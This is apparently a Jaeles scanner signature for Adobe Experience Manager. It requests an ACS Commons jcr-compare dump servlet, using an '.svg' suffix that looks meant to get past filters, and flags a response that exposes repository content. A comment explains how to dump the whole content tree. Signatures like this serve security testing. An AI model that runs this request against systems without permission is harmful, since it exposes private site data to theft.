id: aem-dump-content
info:
  name: AEM Dump Full Content
  risk: Low

# run jaeles ... -p 'dump=/' to get all content
params:
  - dump: /etc/tags/
  - root: "{{.BaseURL}}"

requests:
  - method: GET
    redirect: false
    # timeout: 600
    url: >-
      {{.root}}/bin/acs-commons/jcr-compare.dump.json.servlet.svg/ab.svg?paths={{.dump}}
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "jcr:title") && StringSearch("response", "sling:resourceType")
